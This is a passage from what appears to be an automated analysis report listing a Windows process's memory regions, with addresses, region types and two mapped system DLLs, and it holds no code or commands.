"pagefile_0x0000000002100000" filename = "" Region: id = 12620 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12623 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12624 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12626 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12627 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12628 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12629 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12630 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12631 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12632 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12633 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12634 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12635 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12641 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12642 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12643 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12644 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12650 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12652 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12653 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12654 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12663 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12664 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12665 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12666 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12672 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12675 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12676 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12681 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12690 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12691 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12692 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12693 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12704 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12705 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12706 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12707 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12708 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12709 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12710 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12711 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12712 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12713 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12714 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12715 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12720 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12721 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12722 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12723 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12728 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12732 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12733 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12734 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12741 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12742 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12743 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12744 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12750 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12751 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12752 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12753 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12755 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12756 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12757 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12758 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12759 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12760 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12761 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12762 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12765 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12766 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12767 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12768 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12770 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12773 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12774 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12775 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12777 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12778 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12779 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12780 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12781 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12782 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12783 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12786 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12788 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12789 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12790 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12791 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12797 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12798 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 12800 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12801 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12802 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12808 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12809 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12810 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12811 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12819 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12821 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12822 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12823 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12827 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12828 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 12834 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12835 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12836 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12843 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12844 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12845 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12846 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12847 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12848 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 12849 start_va = 0x7f10000 end_va = 0x8009fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007f10000" filename = "" Region: id = 12851 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12852 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12853 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12856 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12857 start_va = 0xbd70000 end_va = 0xc261fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bd70000" filename = "" Region: id = 12858 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12859 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 12860 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12861 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12862 start_va = 0x590000 end_va = 0x592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 12863 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12864 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12865 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12866 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12867 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12868 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12869 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12870 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12871 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12872 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12873 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12874 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12875 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12876 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12877 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12878 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12879 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12880 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12881 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12882 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12883 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12884 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12885 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12886 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12887 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12888 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12889 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12890 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12891 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12892 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12893 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12894 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12895 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12896 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12897 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12898 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12899 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12900 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12901 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12902 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12903 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12904 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12905 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12906 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12907 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12908 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12909 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12910 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12911 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12912 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12913 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12914 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12915 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12916 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12917 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12918 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12919 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12920 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12921 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12922 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12923 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12924 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12925 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12926 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12927 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12928 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12929 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12930 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 12931 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 12932 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12933 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 12934 start_va = 0x580000 end_va = 